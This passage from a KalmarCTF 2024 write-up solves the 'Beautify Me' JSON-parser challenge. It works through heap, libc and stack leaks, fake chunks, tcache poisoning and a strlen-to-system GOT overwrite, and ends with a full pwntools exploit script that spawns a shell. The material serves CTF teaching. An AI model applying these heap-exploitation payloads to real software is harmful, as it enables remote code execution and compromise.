# Inject next pointer
a_str = 'b'*0x80
info(f'inject...')
buf_size = 0x150
target_free = buf_stack+buf_size
inject = b'c'*0x80+p64(target_free)[:6]
s_json(f'["{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","'.encode()+inject+b'"]')

The goal here is I want to inject the next pointer so that it points to buf_stack+0x150. I’m planning to craft my fake chunks on that area. Let see what happend in the top chunks after we execute the above script.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40


gef> heap top
[+] arena.top: 0x55555555c860
Chunk(addr = 0x55555555c860 , size=0x207a0, flags=PREV_INUSE)
  Chunk size: 133024 (0x207a0)
  Usable size: 133016 (0x20798)
  Previous chunk size: 0 (0x0)
  PREV_INUSE flag: On
  IS_MMAPPED flag: Off
  NON_MAIN_ARENA flag: Off

  Forward pointer: 0x5550000092ec
  Backward pointer: 0x4
gef> x/60gx 0x55555555c860
0x55555555c860: 0x0000000000000000      0x00000000000207a1
0x55555555c870: 0x00005550000092ec      0x0000000000000004
0x55555555c880: 0x0000000000000000      0x0000000000020781
0x55555555c890: 0x0000555000009d3c      0x000055555555c870
0x55555555c8a0: 0x0000000000000000      0x0000000000020761
0x55555555c8b0: 0x00007ffff7facce0      0x000055555555c6e0
0x55555555c8c0: 0x6262626262626262      0x6262626262626262
0x55555555c8d0: 0x6262626262626262      0x6262626262626262
0x55555555c8e0: 0x6262626262626262      0x6262626262626262
0x55555555c8f0: 0x6262626262626262      0x6262626262626262
0x55555555c900: 0x6262626262626262      0x6262626262626262
0x55555555c910: 0x6262626262626262      0x6262626262626262
0x55555555c920: 0x6262626262626262      0x6262626262626262
0x55555555c930: 0x0000000000000090      0x0000000000000020
0x55555555c940: 0x0000555000009ddc      0x0000000000000004
0x55555555c950: 0x0000000000000000      0x00000000000206b1
0x55555555c960: 0x0000555000009c6c      0x000055555555c940
0x55555555c970: 0x0000000000000000      0x0000000000020691
0x55555555c980: 0x6363636363636363      0x6363636363636363
0x55555555c990: 0x6363636363636363      0x6363636363636363
0x55555555c9a0: 0x6363636363636363      0x6363636363636363
0x55555555c9b0: 0x6363636363636363      0x6363636363636363
0x55555555c9c0: 0x6363636363636363      0x6363636363636363
0x55555555c9d0: 0x6363636363636363      0x6363636363636363
0x55555555c9e0: 0x6363636363636363      0x6363636363636363
0x55555555c9f0: 0x6363636363636363      0x6363636363636363
0x55555555ca00: 0x00007fffffffcd20      0x0000000000020601 <- Our injected target address of next

As you can see, we successfully trigger the chunk consolidation, where the top chunk contains our injected value which we prepared to be used as the uninitialized next value (which in this case is the one that located at 0x55555555ca00).

Now that we have successfully inject it, it’s time to trigger the bug. There are two precautions that we need to do here during sending our next input:

We need to ensure that we have put our fake chunks in the target address that we put as the next value.
- In this case, buf_stack+0x50+0x100 need to contains our fake chunks.
Then, we need to ensure that when we trigger the bug, the last array_t element that we allocate overlapping with our prepared uninitialized value.
- In this example, that means the last array_t element that we allocated need to be allocated at address 0x55555555ca00.

To achieve the above precautions, let’s start by checking the bins state first.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31


gef> bins
---------------------------------- Tcache Bins for arena 'main_arena' ----------------------------------
tcachebins[idx=0, size=0x20, @0x55555555c090]: fd=0x55555555c6d0 count=7
 -> Chunk(addr = 0x55555555c6c0 , size=0x20, flags=PREV_INUSE, fd=0x5550000096dc(=0x55555555c380))
 -> Chunk(addr = 0x55555555c370 , size=0x20, flags=PREV_INUSE, fd=0x5550000097bc(=0x55555555c2e0))
 -> Chunk(addr = 0x55555555c2d0 , size=0x20, flags=, fd=0x55500000961c(=0x55555555c340))
 -> Chunk(addr = 0x55555555c330 , size=0x20, flags=PREV_INUSE, fd=0x55500000963c(=0x55555555c360))
 -> Chunk(addr = 0x55555555c350 , size=0x20, flags=PREV_INUSE, fd=0x55500000965c(=0x55555555c300))
 -> Chunk(addr = 0x55555555c2f0 , size=0x20, flags=PREV_INUSE, fd=0x55500000967c(=0x55555555c320))
 -> Chunk(addr = 0x55555555c310 , size=0x20, flags=PREV_INUSE, fd=0x55555555c(=0x000000000000))
tcachebins[idx=7, size=0x90, @0x55555555c0c8]: fd=0x55555555c3a0 count=7
 -> Chunk(addr = 0x55555555c390 , size=0x90, flags=PREV_INUSE, fd=0x55500000916c(=0x55555555c430))
 -> Chunk(addr = 0x55555555c420 , size=0x90, flags=PREV_INUSE, fd=0x55500000919c(=0x55555555c4c0))
 -> Chunk(addr = 0x55555555c4b0 , size=0x90, flags=PREV_INUSE, fd=0x55500000902c(=0x55555555c570))
 -> Chunk(addr = 0x55555555c560 , size=0x90, flags=PREV_INUSE, fd=0x55500000931c(=0x55555555c640))
 -> Chunk(addr = 0x55555555c630 , size=0x90, flags=PREV_INUSE, fd=0x55500000924c(=0x55555555c710))
 -> Chunk(addr = 0x55555555c700 , size=0x90, flags=, fd=0x5550000092bc(=0x55555555c7e0))
 -> Chunk(addr = 0x55555555c7d0 , size=0x90, flags=, fd=0x55555555c(=0x000000000000))
[+] Found 14 valid chunks in tcache.
----------------------------------- Fast Bins for arena 'main_arena' -----------------------------------
fastbins[idx=0, size=0x20, @0x7ffff7facc90]: fd=0x55555555c540
 -> Chunk(addr = 0x55555555c540 , size=0x20, flags=PREV_INUSE, fd=0x55500000934c(=0x55555555c610))
 -> Chunk(addr = 0x55555555c610 , size=0x20, flags=PREV_INUSE, fd=0x5550000090ac(=0x55555555c5f0))
 -> Chunk(addr = 0x55555555c5f0 , size=0x20, flags=PREV_INUSE, fd=0x55555555c(=0x000000000000))
[+] Found 3 valid chunks in fastbins.
---------------------------------- Unsorted Bin for arena 'main_arena' ----------------------------------
unsorted_bin[idx=0, size=any, @0x7ffff7faccf0]: fd=0x55555555c290, bk=0x55555555c6e0
 -> Chunk(addr = 0x55555555c290 , size=0x40, flags=PREV_INUSE, fd=0x55555555c790, bk=0x7ffff7facce0)
 -> Chunk(addr = 0x55555555c790 , size=0x40, flags=PREV_INUSE, fd=0x55555555c6e0, bk=0x55555555c290)
 -> Chunk(addr = 0x55555555c6e0 , size=0x20, flags=PREV_INUSE, fd=0x7ffff7facce0, bk=0x55555555c790)
[+] Found 3 valid chunks in unsorted bin.

We want to allocate array_t elements by consuming the top chunk. array_t struct’s size is 0x10, which mean it will consume the 0x20 freed chunk. That means, we need to consume all of the 0x20 freed chunks and the unsortedbin chunks as well. In total, we need to allocate at least 15 chunks with size 0x20 (10 from tcache + fastbin, 5 from unsortedbin).

If we send an array as our input, it will consume one 0x20 chunk (because it is a json_t object). Next, when we add one integer element to the array, it will consume two 0x20 chunks. If we allocate an array of 7 integer elements, this will consumed all of the 15 chunks from the freelist.

Next, observed that our injected next value located at top+0x1a0. So, we need to allocate more element first, so that the last element of our input array will be placed on there. There are many ways to do this, but after calculating it thoroughly, I came with the below payload:

1
2


payload =  b'[0,0,0,0,0,0,0, ' # Consume all of the 15 0x20 chunks
payload += b'0,0,1,"1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",64' # Last element next will be filled with our injected value before, which is buf_stack+0x150

The above input will make the last element next points to buf_stack+0x150. Now, we still need to extend that payload, because we need to ensure buf_stack+0x150 contains a valid array_t elements. To do this, we can simply pad our input first with \x00 up until 0x150. By padding it with null bytes, the parse_value function will stop the parse only until our last element, even though our input size is much larger than that.

Now, we need to think how to craft the fake chunks. I came up with the below layout:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


payload = payload.ljust(buf_size-0x10, b'\x00')
p_stack = target_free
payload += flat([
    p64(0), p64(0x71),
    p64(p_stack+0x70), p64(p_stack+0x40), # p_stack is this address
    p64(0), p64(0),
    p64(0), p64(0),
    p64(0), p64(0x31),
    p64(0), p64(0x0), # p_stack+0x40
    p64(0), p64(0),
    p64(0), p64(0x31),
    p64(0), p64(p_stack+0xa0), # p_stack+0x70
    p64(0), p64(0),
    p64(0), p64(0x31),
    p64(0), p64(0), # p_stack+0xa0
    p64(0), p64(0),
    p64(0), p64(0x31),
])
s_json(payload)

To explain the above payload:

I set the next pointer of the fake chunk (located at p_stack) points to p_stack+0x70, and set the value pointer to p_stack+0x40.
I set both of the p_stack+0x70 and p_stack+0x40 chunk size to 0x31.
I set the next pointer of p_stack+0x40 to null, and set the value pointer to p_stack+0xa0.
I set the p_stack+0xa0 chunk size to 0x31.
Then, I set the chunk size of p_stack to 0x71, just to be safe during free, so that the p_stack next chunk is pointing to a valid chunk (which in this case p_stack+0x70).

When the free_value try to free our input, due to the next bug, our fake chunks will be iterated as well, and they will be freed and sent to the tcache bins list for chunks with size 0x30. Below is the bins state after the above script execution.

1
2
3
4
5
6
7
8


gef> bins
...
tcachebins[idx=1, size=0x30, @0x55555555c098]: fd=0x7fffffffcd90 count=4
 -> Chunk(addr = 0x7fffffffcd80 , size=0x30, flags=PREV_INUSE, fd=0x7ff80000323c(=0x7fffffffcdc0))
 -> Chunk(addr = 0x7fffffffcdb0 , size=0x30, flags=PREV_INUSE, fd=0x7ff80000329c(=0x7fffffffcd60))
 -> Chunk(addr = 0x7fffffffcd50 , size=0x30, flags=PREV_INUSE, fd=0x5552aaaa362c(=0x55555555c9d0))
 -> Chunk(addr = 0x55555555c9c0 , size=0x30, flags=PREV_INUSE, fd=0x55555555c(=0x000000000000))
...

Now that we have put our fake chunks to the freelist, we can move to the last step, which is gaining shell.

Gaining shell

In order to gain shell, my plan is to overwrite the strlen GOT of libc to system, so that when it call printf during print_value try to print an object key (which is string type), it will call system with our input key as the parameter. So, to do that, we need to poison the tcache of 0x30 metadata.

Poisoning it is very simple. Because all of the freed chunks are overlapping with the buf_stack, we can simply abuse the LOC to read our raw input to poison it. Take a look at the below script:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


# Tcache poison time!
payload = b'\x00'*(buf_size-0x10)
payload += flat([
    p64(0), p64(0x71),
    p64(0), p64(0),
    p64(0), p64(0),
    p64(0), p64(0),
    p64(0), p64(0x31),
    p64(0), p64(0x0),
    p64(0), p64(0),
    p64(0), p64(0x31),
    p64(mangle(buf_stack,libc.address+0x21a080)), p64(0),
    p64(0), p64(0),
    p64(0), p64(0x31),
    p64(0), p64(0),
    p64(0), p64(0),
    p64(0), p64(0x31),
])
s_json(payload)

We basically just need to send null bytes to the binary (so that it won’t do any parsing to our input), then pad it like what we did before, and overwrite all of the mangled pointer to our desired address, which is the strlen GOT address minus by 0x18. We need to do this because we plan to allocate a string object to trigger the allocation of the 0x30 chunks, and the binary use strndup to do this. So, by sending a string of b'a'*0x18 appended with the system address, strndup will allocate 0x30 chunks (which located at strlen GOT minus 0x18), and it will overwrite the strlen GOT with system.

Taking a look at the previous tcache list, we know that p_stack+0x70 is the first entry. So, we just need to poison that freed chunk with the target address. We send this payload, and now we successfully poison the tcache list. Below is the updates list after we execute the above script.

1
2
3
4
5
6


gef> bins
...
tcachebins[idx=1, size=0x30, @0x55555555c098]: fd=0x7fffffffcd90 count=4
 -> Chunk(addr = 0x7fffffffcd80 , size=0x30, flags=PREV_INUSE, fd=0x7ff808053f7c(=0x7ffff7fac080))
 -> Chunk(addr = 0x7ffff7fac070 , size=0x7ffff7f319a0, flags=, fd=0x7ffff7f330c0(=0x7ff8080c4f6c)) <- target got address
...

Now that we have successfully poison the tcache list, it’s time for us to overwrite it with system and spawn a shell. Below is the last script that we need to execute.

1
2


payload = b'["/bin/sh;aaaaaaaaaaaaaaaaaaaaaaaa","aaaaaaaaaaaaaaaaaaaaaaaa'+p64(libc.sym.system)[:6]+b'"]'
s_json(payload)

The above execution will overwrite strlen GOT with system, then during print_value, when it try to print our first entry (which contains /bin/sh), it will call strlen to that string, and due to the overwrite, it will call system("/bin/sh") instead.

Finally, we have finished our exploitation. Below is the full script to exploit the challenge.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139


from pwn import *

exe = ELF("json_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

context.binary = exe
context.arch = 'amd64'
context.encoding = 'latin'
context.log_level = 'INFO'
context.terminal = ['wezterm', 'cli', 'split-pane', '--top', '--percent', '65']
warnings.simplefilter("ignore")

remote_url = "chal-kalmarc.tf"
remote_port = 2
gdbscript = '''
'''

def conn():
    if args.LOCAL:
        r = process([exe.path])
        if args.PLT_DEBUG:
            gdb.attach(r, gdbscript=gdbscript)
            pause()
    else:
        r = remote(remote_url, remote_port)

    return r

def demangle(val, is_heap_base=False):
    if not is_heap_base:
        mask = 0xfff << 52
        while mask:
            v = val & mask
            val ^= (v >> 12)
            mask >>= 12
        return val
    return val << 12

def mangle(heap_addr, val):
    return (heap_addr >> 12) ^ val

r = conn()
menu_delim = b'> '
def logbase(): info('libc.address = %#x' % libc.address)
def logleak(name, val):  info(name+' = %#x' % val)
def sa(delim,data): return r.sendafter(delim,data)
def sla(delim,line): return r.sendlineafter(delim,line)
def sl(line): return r.sendline(line)
def so(data): return r.send(data)
def sn(num): return str(num).encode()
def menu(num): return sla(menu_delim, sn(num))

def s_json(payload):
    sla(menu_delim, payload)

# Heap leak
s_json(b'{[0,0]:0}')
r.recvuntil(b'"')
leaked_heap = u64(r.recvuntil(b'"')[:-1].ljust(8, b'\x00'))
logleak('leaked_heap', leaked_heap)

# Trigger unsorted bin
a_str = 'a'*0x80
s_json(f'["{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","{a_str}",64]')

# Libc leak
target = leaked_heap+0x570
s_json(f'{{{target}:0}}')
r.recvuntil(b'"')
leaked_libc = u64(r.recvuntil(b'"')[:-1].ljust(8, b'\x00'))
logleak('leaked_libc', leaked_libc)
libc.address = leaked_libc-(libc.sym.main_arena+96)
logleak('libc.address', libc.address)

# Leak stack
target = libc.sym.environ
s_json(f'{{{target}:0}}')
r.recvuntil(b'"')
leaked_stack = u64(r.recvuntil(b'"')[:-1].ljust(8, b'\x00'))
logleak('leaked_stack', leaked_stack)
buf_stack = leaked_stack-0x1138
logleak('buf_stack', buf_stack)

# Inject next pointer
a_str = 'b'*0x80
info(f'inject...')
buf_size = 0x150
target_free = buf_stack+buf_size
inject = b'c'*0x80+p64(target_free)[:6]
s_json(f'["{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","'.encode()+inject+b'"]')

payload =  b'[0,0,0,0,0,0,0, ' # Consume all of the 15 0x20 chunks
payload += b'0,0,1,"1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",64' # Last element next will be filled with our injected value before, which is buf_stack+0x150
payload = payload.ljust(buf_size-0x10, b'\x00')
p_stack = target_free
payload += flat([
    p64(0), p64(0x71),
    p64(p_stack+0x70), p64(p_stack+0x40),
    p64(0), p64(0),
    p64(0), p64(0),
    p64(0), p64(0x31), # FREED
    p64(0), p64(0x0),
    p64(0), p64(0),
    p64(0), p64(0x31), # FREED
    p64(0), p64(p_stack+0xa0),
    p64(0), p64(0),
    p64(0), p64(0x31), # FREED
    p64(0), p64(0),
    p64(0), p64(0),
    p64(0), p64(0x31),
])
s_json(payload)

# Tcache poison time!
payload = b'\x00'*(buf_size-0x10)
payload += flat([
    p64(0), p64(0x71),
    p64(0), p64(0),
    p64(0), p64(0),
    p64(0), p64(0),
    p64(0), p64(0x31),
    p64(0), p64(0x0),
    p64(0), p64(0),
    p64(0), p64(0x31),
    p64(mangle(buf_stack,libc.address+0x21a080)), p64(0),
    p64(0), p64(0),
    p64(0), p64(0x31),
    p64(0), p64(0),
    p64(0), p64(0),
    p64(0), p64(0x31),
])
s_json(payload)

# Overwrite strlen with system?
payload = b'["/bin/sh;aaaaaaaaaaaaaaaaaaaaaaaa","aaaaaaaaaaaaaaaaaaaaaaaa'+p64(libc.sym.system)[:6]+b'"]'
s_json(payload)

r.interactive()

Running the above script, we will be able to spawn a shell and read the flag :)

Flag: kalmar{that_was_some_truly_beautiful_json_<3}

Follow me on twitter

Contents

KalmarCTF 2024

Pwn

Beautify Me

Initial Analysis

Analyze main function

Analyze parser function

Analyze print function

Solution

Leaking useful values

Leaking heap address

Leaking libc address

Gaining Remote Code Execution

Reproducing the next bug

Abusing the next bug

Gaining shell

Social Media

Reproducing the `next` bug

Abusing the `next` bug